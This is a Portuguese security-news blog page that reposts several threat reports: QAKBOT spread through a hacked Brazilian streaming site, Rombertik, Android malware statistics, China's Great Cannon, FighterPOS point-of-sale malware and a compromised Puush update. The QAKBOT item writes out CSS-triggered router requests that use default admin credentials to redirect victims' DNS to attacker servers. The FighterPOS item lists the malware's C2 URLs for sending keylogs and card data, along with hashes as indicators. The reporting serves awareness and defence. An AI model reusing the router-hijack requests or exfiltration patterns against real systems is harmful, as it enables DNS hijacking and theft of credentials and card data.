Site brasileiro hackeado propaga malware russo

MalwareChegou a nosso conhecimento que um site de streaming de vídeo brasileiro teve sua página principal comprometida, de modo que ataques diferentes eram feitos contra todos os usuários que a acessavam, cerca de 40.000 somente em Janeiro deste ano segundo o Alexa.

O ataque exigia apenas que a vítima visualizasse a página principal do site utilizando um navegador qualquer e desdobrava-se em três etapas:

1. Uma falsa notícia de necessidade de instalação do plugin do Flash.

Na página HTML principal do site, encontramos os seguinte código, que desenha uma caixa imitando a que os navegadores exibem quando um plugin é necessário para a visualização correta de um site. Caso o usuário clicasse no botão “OK” (ok.png), este faria o download de um arquivo install.zip, que continha um cliente da botnet QAKBOT comprimido.

qabot2. Tentativas de ataque de força bruta ao roteador da vítima, com a intenção de alterar as configurações de DNS.

Ainda na mesma página, o atacante utilizou-se do comando @import do CSS [https://developer.mozilla.org/pt-BR/docs/Web/CSS/@import] para forçar o navegador a fazer uma requisição HTTP GET para endereços como:

hxxp://admin:admin@10.0.0.1/dnscfg.cgi?dnsPrimary=200.98.170.34&dnsSecondary=200.98.170.111&dnsDynamic=0&dnsRefresh=1;

hxxp://admin:admin@192.168.1.1/userRpm/PPPoECfgAdvRpm.htm?wan=0&lcpMru=1480&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver=200.98.170.34&dnsserver2=200.98.170.111&
downBandwidth=0&upBandwidth=0&Save=&Advanced=Advanced

hxxp://admin:admin@10.1.1.1/dnscfg.cgi?dnsPrimary=200.98.170.34&dnsSecondary=200.98.170.111&dnsDynamic=0&dnsRefresh=1

O que essas requisições fazem é aproveitar a autenticação HTTP básica normalmente utilizadas em roteadores ADSL para alterar os IPs dos servidores DNS configurados nestes dispositivos. Contando que os usuários não alterem a senha padrão (o ataque em questão tenta com a senha “admin”), os atacantes tentaram alterar os servidores DNS das vítimas para 200.98.170.34 e 200.98.170.111, felizmente já retirados do ar.

Parte do trecho de código responsável por este estágio do ataque é exibida na imagem abaixo:

qabot13. Instalação de um cliente da botnet QAKBOT.

O último estágio requeria que a vítima acessasse o site comprometido utilizando o Internet Explorer, pois dependia da execução de um script em VBScript (interpretado como ActiveX), para baixar e instalar o cliente da QAKBOT, com o seguinte trecho de código:

qabot2A técnica utilizada neste curto script é bastante engenhosa: o atacante converteu todos os bytes do executável do cliente da QAKBOT para uma grande string na linha 237. Com o loop na linha 242, o código converte de volta cada byte original do arquivo executável e o escreve, um por um, num arquivo chamado svchost.exe, no diretório temporário. Na linha 248 ele finalmente executa o malware.

Apesar de funcional, a execução deste trecho normalmente requer que a vítima responda “Sim” para muitas confirmações que o Internet Explorer faz, como mostra a imagem abaixo:

qabot3No momento em que tivemos acesso à página comprometida, este trecho estava comentado/desativado, provavelmente pelo próprio atacante dadas as várias condições necessárias para o sucesso da infecção.

Em caso de sucesso na alteração dos servidores DNS utilizados pelas vítimas, os perigos são grandes: ao acessar sites de banco, e-mail, redes sociais etc os usuários podem facilmente ter suas credenciais e informações pessoais roubadas pelo atacante. Isto porque o sistema normalmente “pergunta” ao servidor DNS como chegar ao site que o usuário quer acessar e, utilizando um DNS de controle do atacante, este último pode instruir o computador da vítima a exibir uma cópia maliciosa do site desejado.

Já a tentativa de instalação da botnet, em caso de sucesso, permite que o atacante controle totalmente a máquina da vítima de forma remota, transformando-a no que chamamos de “máquina zumbi”, que passa a obedecer ordens, tais quais podem variar de envio de dados sensíveis a iniciar ataques de negação de serviço contra serviços expostos na Internet.

Apesar de antiga, a QAKBOT é poderosa e cheia de recursos. O arquivo executável que atua como cliente dela tem uma série de fatores que nos levam a concluir ter sido criada na Rússia, em linguagem Assembly. Com apenas 82 KB de tamanho já descomprimido, é também preparado para não ser analisado, possuindo técnicas de anti-debugging e anti-VM. Todo o controle é efetuado por um servidor nos Estados Unidos.

O que chamou nossa atenção neste ataque?

A colaboração entre cibercriminosos brasileiros e russos não é novidade, mas ainda é bastante ativa.
O uso do comando @import para o ataque de força bruta ao modem/roteador da vítima. Várias outras amostras deste mesmo ataque utilizam JavaScript no lugar de CSS.
A tentativa de instalar um cliente de uma botnet antigo, comprimido (packed) para tentar disfarçar sua origem, o que sugere que ele ainda funcione – e de fato o servidor de comando e controle (C&C) está ativo.

Agradecemos ao Henrique-RJ, colaborador amigo do seu micro seguro, pela referência a essa notícia.

Fonte: Trend Micro blog

Novo malware pode apagar o HD da vítima

malware_novoOs pesquisadores do Talos Group, da Cisco, descobriram uma nova espécie de malware que faz de tudo para se esconder das ferramentas de análise. Em último caso, o malware é capaz de apagar todo o disco rígido da vítima com o objetivo de se manter escondido.

O software malicioso recebeu a alcunha de Rombertik. Ele se espalha por meio de arquivos anexos em e-mails e seu objetivo é coletar todo tipo de dados importantes da vítima, possivelmente credenciais de login e informações bancárias, por exemplo.

Os pesquisadores fizeram a engenharia reversa e descobriram que o vírus é capaz de fugir da análise utilizando vários níveis de ofuscação, que tornam difícil para pessoas de fora entender como ele funciona. E, caso o Rombertik perceba que está sendo observado por um pesquisador de segurança, ele se autodestrói, levando junto o HD da vítima.

Segundo os especialistas do Talos Group, há vários outros malwares que tentam driblar a análise, mas o Rombertik é o primeiro caso de vírus que destrói o computador para tal.

O vírus também usa outras técnicas menos destrutivas para fugir da análise. Ao ser executado em sandbox, modo que permite ao malware agir de modo livre em um ambiente controlado, ele escreve um byte de dados aleatórios na memória 960 milhões de vezes, o que causa demora e pode causar problemas na ferramenta de sandbox, além de evitar que ferramentas de análise documentem o comportamento preciso do vírus.

Agradecemos ao Davi e ao Paulo Sollo, colaboradores amigos do seu micro seguro, pela referência a essa notícia.

Fontes: Olhar Digital e ars technica

Malwares avançam sobre o sistema Android

androidmalwareO Android é um sistema que recorrentemente se vê exposto a problemas de segurança graves. Tipicamente, são aplicativos que são lançadas na Play Store e lojas similares que conseguem infectar milhares de equipamentos roubando dados e/ou outros elementos.

Um estudo recente revelou um cenário ainda pior e muito preocupante para os usuários do Android. Em 2014, 1 em cada 6 aplicativos existentes para Android era na realidade um malware disfarçado.

Os números apresentados resultam de um estudo feito pela Symantec, realizado durante o ano de 2014, e revelam um cenário muito sombrio para o Android e para os aplicativos que os usuários têm acesso.

Dentre o que se pode concluir da análise desse estudo, o percentual de aplicativos maliciosos nas diferentes lojas de apps a que o usuário tem acesso estão cada vem mais sendo ocupadas com softwares que depois de instalados acabam se transformando em uma dor de cabeça para os seus usuários.

Este número é extremamente elevado, girando em torno dos 17%, um valor que não se esperaria ver e que mostra fragilidades nos sistemas de aprovação de aplicativos nas lojas Android.

Mas para além deste número elevado, há um ainda mais preocupante e igualmente alto. Falamos do software que a Symantec categorizou como greyware.

Este software não se revela problemático no momento da instalação, mas algum tempo depois assume a sua verdadeira identidade e acaba por se tornar maligno. Este software representa já cerca de 36% dos aplicativos disponíveis para instalação.Este estudo avaliou mais de 200 lojas de aplicações para Android, de onde foram descarregadas mais de 50 mil aplicações.

A maioria do malware encontrado pretende principalmente roubar dados do usuário, como números de telefone bem como agendas, para depois serem vendidas.

Há ainda os que conseguem fazer com que os smartphones passem a enviar SMS para serviços de custo bem elevado ou que apresentam publicidade sem qualquer controlr do usuário.

As áreas onde existe maior propagação deste malware são em locais onde é difícil ou impossível o acesso à loja de aplicativos da Google, o que obriga os usuários a recorrerem a lojas de apps não oficiais que em muitas vezes encontram-se adulteradas ou alteradas com propósitos bem claros.

Curiosamente este mesmo estudo conseguiu encontrar três aplicativos para iOS que eram malware, mas que obrigavam os usuários a realizar jailbreak para que algum problema fosse detectado.

Resumidamente pode-se dizer que o problema maior do Android está mesmo nos aplicativos que se obtêm de lojas paralelas às oficiais e onde não existe qualquer controle sobre os aplicativos ali disponibilizados.

Agradecemos ao Davi, colaborador amigo do seu micro seguro, pela referência a essa notícia.

Fonte: pplwware

Nova ferramenta que derruba sites e distribui malware

The hackerNo início de abril o Citizen Lab, da Universidade de Toronto, publicou uma análise em conjunto com pesquisadores da University of California, Berkeley, do International Computer Science Institute (ICSI) e da Princeton University, sobre um ataque de DDoS nomeado China’s Great Cannon.

As vítimas, o GitHub (usado como repositório de software) e o Great Fire (criado para evitar a censura chinesa com o acesso à internet), sofreram ataques DDoS através de tráfego direcionado ao maior site de buscas da China, o Baidu.

Não é a primeira vez que um país é acusado de interferir no tráfego web intencional, mas é a primeira vez que se usa esse tipo de técnica para um ataque DDoS em grande escala. No caso em questão, 98% das conexões através do Baidu funcionaram sem problemas, mas os outros 2% foram usados para atacar o GitHub e o Great Fire numa espécie de ataque “man-in-the-middle” em que em que os dados trocados entre duas partes são interceptados.

Uma nota interessante é que o tráfego HTTPS não estaria suscetível a esse tipo de ataque (justamente por ser um protocolo ou conjunto de regras e códigos com uma camada de segurança que torna a navegação mais segura), entretanto, a maioria dos sites ainda usa HTTP.

Agradecemos ao Davi, colaborador amigo do seu micro seguro, pela referência a essa notícia.

Fonte: Tecmundo

Malware para pontos de venda cresce de forma preocupante no Brasil

pdvNovas amostras de malware para ponto de venda (PDV) estão constantemente sendo criadas. Seja pela necessidade de evitar a detecção por antivírus ou pelo desejo de ser mais funcional e modular, essas amostras são desenvolvidas com uma velocidade incrível, infectando os terminais, um IP por vez.

Recentemente, enquanto investigávamos sites clandestinos, um anúncio em um fórum da “Dark Web” chamou nossa atenção. O post mencionava um novo malware PDV que estava sendo vendido por seu criador. Um único arquivo .exe era particularmente caro, a um valor de 18 BTCs (no momento em que este artigo é escrito), mas ele parece ser bem projetado e suportar diversas funcionalidades. Este é FighterPOS, como o chamamos, e cujos recursos detalhamos a seguir.

Aquisição
Qualquer pessoa que deseja comprar um malware PDV não precisa procurar por muito tempo.

Porém, encontrar amostras e painéis novos e indetectáveis são mais difíceis de encontrar. Enquanto pesquisávamos a “Deep Web”, descobrimos um anuncio publicitário de um novo malware PDV. Apesar de não ser revolucionário, o que chamou nossa atenção foi a natureza profissional e o suporte a funcionalidades do novo malware.

Anúncio publicitário do FighterPOS:

fighterpos_1.1O malware e seu painel de controle estão sendo vendidos por 18,3823 BTCs no momento em que este artigo foi escrito, o que corresponde aproximadamente a $ 5.251,82 dólares. Apesar do valor aparentemente elevado, a oportunidade de recuperar o investimento é relativamente fácil. O comprador poderia revender cada número de cartão de crédito, ou armazená-lo e utilizar para uso próprio. Se o comprador deseja um executável e uma instância do painel adicional, o autor cobra $ 800 dólares a mais.

Painel de Controle do FighterPOS:

fighterpos_2O autor informa explicitamente que os executáveis não são totalmente indetectáveis (FUD), alegando que o usuário precisará de um serviço de criptografia para garantir que o malware não seja detectado por verificadores antivírus. Isso é comum na criação de malware PDV, e serviços de criptografia são geralmente necessários para evitar muitos controles de segurança.

Vítimas
Os dados obtidos a partir dos servidores C&C indicaram que o FighterPOS já infectou cerca de 113 terminais de ponto de venda, mais de 90% foram encontrados no Brasil. Existem evidências de infecção de sistema em outros países, incluindo os Estados Unidos, México, Itália e Reino Unido.

Distribuição de máquinas afetadas pelo FighterPOS:

fighterpos_3.1Juntos, os sistemas infectados enviaram 22.112 depósitos originais de cartões de crédito para um único mês (final de fevereiro e início de abril) para o operador do FighterPOS. Muitas das vítimas de FighterPOS são usuários de sistemas Linx MicroVix ou Linx POS – ambos os conjuntos de softwares populares no Brasil.

Registros das vítimas:

fighterpos_4Os registros do FighterPOS são armazenados num formato indicativo de outras amostras de malware PDV. Os nomes de registro para os cartões de crédito seguem o formato: [D][<machine_id>][<machine name>] .txt.

Arquivos de Registros:

fighterpos_5.1Além disso, os registros de teclas digitadas (keylog) são armazenados no formato: [K] <Logname>.txt. Esses registros são separados por marcação de data (timestamp) com as teclas correspondentes.

Arquivo keylog mostrando conversas por Skype:

fighterpos_6

Funcionalidades do FighterPOS
As funcionalidades do FighterPOS são semelhantes às de outras famílias de malware PDV vistas anteriormente. O autor do executável coleta os dados track1, track2 e códigos de segurança (CVV) dos cartões de crédito. O malware também possui uma funcionalidade “RAM scraping”, encontrada na maioria das famílias de malware PDV. Além disso, seu recurso “keylogger” permite que o agressor registre todas as teclas digitadas no terminal infectado.

Duas amostras de malware que chamaram nossa atenção eram IE.exe (55fb03ce9b698d30d946018455ca2809) e IEx.exe (55fb03ce9b698d30d946018455ca2809). Descobrimos que elas estavam se comunicando com o C2 do malware – hxxp://ctclubedeluta.org/.

Ambas as amostras eram escritas em Visual Basic 6. Apesar do Visual Basic 6 ser considerado obsoleto e antiquado, ele ainda funciona muito bem, até mesmo em sistemas atualizados. A primeira coisa que o FighterPOS faz é criar uma cópia de si mesmo em outro local para persistência. Em seguida, ele conversa com o painel de administração enviando um email ou um HTTP GET para seu C2, como demonstra a seguinte imagem:

fighterpos_7Após notificar o painel do administrador, o malware implementa uma funcionalidade de controle por meio de um timer que verifica se há novos comandos do C2.

fighterpos_8Existem múltiplos comandos suportados pelo FighterPOS, entre eles:

  • Atualização automática do malware
  • Download e execução de arquivo
  • Envio de dados de cartão de crédito
  • Envio de dados de teclas registradas (keylog)
  • Ataques DDoS Layer 7 ou Layer 4

Os dados extraídos são enviados com criptografia AES para seu C2, por meio de HTTP ou usando “TCP chunks”. Uma funcionalidade adicional inclui a capacidade de realizar ataques DDoS layer 7 e layer 4, por meio de HTTP e UDP “flooding”:

fighterpos_9A funcionalidade DDoS faz com que essa família de malware PDV seja uma plataforma flexível e atraente para compradores em potencial.

fighterpos_10A comunicação comando e controle ocorre num formato muito específico. Por exemplo, quando o keylogger está enviando os dados de volta ao C2, a comunicação parece da seguinte maneira:

hxxp://69.195.77.74/BrFighter/bot/keylogger.php?id=<ID>&com=<ID>&key={data}

Além disso, quando o coletor de cartão de crédito está ativo, a comunicação parece assim: hxxp://69.195.77.74/BrFighter/bot/dumper.php?id=<ID>&log={DATA}

Conclusão
O FighterPOS é um malware completo, projetado cuidadosamente e com forte criptografia. Ele suporta múltiplas formas de comunicação com sua infraestrutura de comando e controle, suporta o registro de teclas (keylogging), permite ataques DDoS, e suporta controle total das máquinas infectadas.

Estamos continuamente avaliando essa ameaça, e ainda estamos pesquisando não apenas a família de malware, mas também a infraestrutura de comando e controle. Essa informação e a análise de outra nova família de malware PDV serão anunciadas num relatório em breve.

Todas as amostras mencionadas neste blog são detectadas com o nome HS_POSFIGHT.SM

Indicadores de Comprometimento

Hashes

55fb03ce9b698d30d946018455ca2809 IE.exe

af15827d802c01d1e972325277f87f0d IE.exe

361b6fe6f602a771956e6a075d3c3b78 IE.exe

b99cab211df20e6045564b857c594b71 IE.exe

e647b892e3af16db24110d0e61a394c8 IEx.exe

C2

hxxp://ctclubedeluta.org/

Agradecemos ao Paulo Sollo, colaborador amigo do seu micro seguro, pela referência a essa notícia.

Fonte: Trendmicro blog

Malware vs Criptografia: um embate sem fim?

malwareO crescimento da utilização da criptografia como mecanismo de garantia de privacidade está criando condições perfeitas para que criminosos virtuais consigam ocultar suas ameaças, dificultando, inclusive, a detecção das mesmas em meio aos dados criptografados, revela estudo divulgado pela Blue Coat.

O uso da criptografia em uma ampla variedade de sites, tanto em sites de empresas como para os pessoais, aumenta na mesma proporção em que cresce a preocupação com a privacidade pessoal na rede. Da lista dos Top 10 sites do mundo elaborada pela serviço de monitoramento Alexa, da Amazon, oito utilizam a criptografia SSL na totalidade ou parte de seus sites.

Por exemplo, grandes companhias como Google, Facebook e a própria Amazon mudaram para um sistema de “HTTPS forçado” que protege todos seus dados em trânsito usando criptografia SSL. “O grande desafio da criptografia é a falsa sensação de segurança que ela passa. As ameaças que conseguem se instalar nestes dados codificados dificultam a possibilidade de serem identificadas pelos sistemas de segurança”, afirma Marcos Oliveira, gerente geral da Blue Coat no Brasil.

Como resultado, a criptografia acaba permitindo que ameaças ultrapassem os mecanismos de segurança de rede e possibilite que dados corporativos vazem dentro das empresas. Em um período típico de sete dias, o Blue Coat Labs, o laboratório global de segurança da companhia, recebeu mais de 100 mil pedidos de clientes para análise de segurança sobre sites que usam o protocolo de criptografia HTTPS para comando e controle remoto de malwares.

A crescente utilização de criptografia significa que muitas empresas não são capazes de controlar as informações corporativas que entram e saem de suas redes, criando um ponto cego crescente para as empresas. Em um período de 12 meses, a partir de setembro de 2013, entre 11% e 14% das solicitações de informações de segurança que os pesquisadores da Blue Coat receberam a cada semana estavam perguntando sobre sites criptografados.

Aplicações essenciais no cotidiano das empresas, como armazenamento de arquivos, buscas, além de soluções de cloud e mídias sociais, vêm utilizando a criptografia como meio de proteção de dados. No entanto, a falta de visibilidade do tráfego SSL representa uma vulnerabilidade potencial em muitas empresas onde usos benignos e hostis do SSL são indistinguíveis para muitos dispositivos de segurança.

Como explica o ultimo relatório de segurança da Blue Coat, denominado “Bloqueio de Visibilidade”, o tráfego criptografado se tornou mais popular entre os cibercriminosos porque:

Os ataques de malwares que usam a criptografia como esconderijo não precisam ser complexos, já que os operadores destas ameaças acreditam que a criptografia impede a empresa de visualizar o ataque;

Perdas significativas de dados podem ocorrer como resultado de atividades maliciosas por parte de invasores, que podem facilmente transmitir informações confidenciais ou sensíveis;​​

Pela simples combinação de websites de curta duração, chamadas “Ameaças de Um Dia” (One-day Wonders), com a criptografia e executando malwares de invasão e/ou roubo de dados através de SSL, as organizações podem ser totalmente incapazes de visualizar que está acontecendo um ataque, sendo impossibilitadas de prevenir, detectar ou responder. As vulnerabilidades são um risco crescente. Especialistas da IBM dão dicas de como enfrentar as vulnerabilidades. Saiba mais.

Agradecemos ao Davi, colaborador amigo do seu micro seguro, pela referência a essa notícia.

Fonte: Convergência Digital

App do site Puush instala malware em atualização automática

puush_malwareO site Puush, que oferece uma plataforma para compartilhamento de imagens de captura de tela, informou que a versão r94 do seu aplicativo, distribuída por atualização automática neste domingo (29), infectou o computador dos usuários com uma praga digital para roubo de senhas. O programa malicioso foi incluído na atualização por um invasor que conseguiu acesso ao sistema que distribui o software.

O Puush é usado para agilizar a criação e compartilhamento de capturas de tela. O aplicativo facilita a captura e envio imediato da imagem, oferecendo um link que pode ser repassado por qualquer meio.
De acordo com os administradores da página, nenhuma outra informação foi comprometida no ataque. A versão mais recente do aplicativo, a r100, inclui uma ferramenta que remove os arquivos criados pela praga digital.
Para quem não quer continuar usando o programa depois da invasão, o site oferece uma ferramenta de limpeza avulsa (baixe aqui).

O programa malicioso foi desenvolvido para roubar senhas armazenadas no computador e transmiti-las para o invasor. De acordo com o Puush, a praga reúne as senhas armazenadas no computador – tais como as senhas de navegadores web -, mas a transmissão delas ainda não foi confirmada em testes feitos pelos desenvolvedores do serviço. É possível que o código tenha algum erro de programação.

O site recomenda que usuários troquem qualquer senha importante por precaução. O Puush é oferecido para Windows, Mac OS X e iPhone, mas apenas a versão para Windows foi infectada.

Agradecemos ao Davi e ao Paulo Sollo, colaboradores amigos do seu micro seguro, pela referência a essa notícia.

Fonte: G1
Seguir

Obtenha todo post novo entregue na sua caixa de entrada.

Junte-se a 552 outros seguidores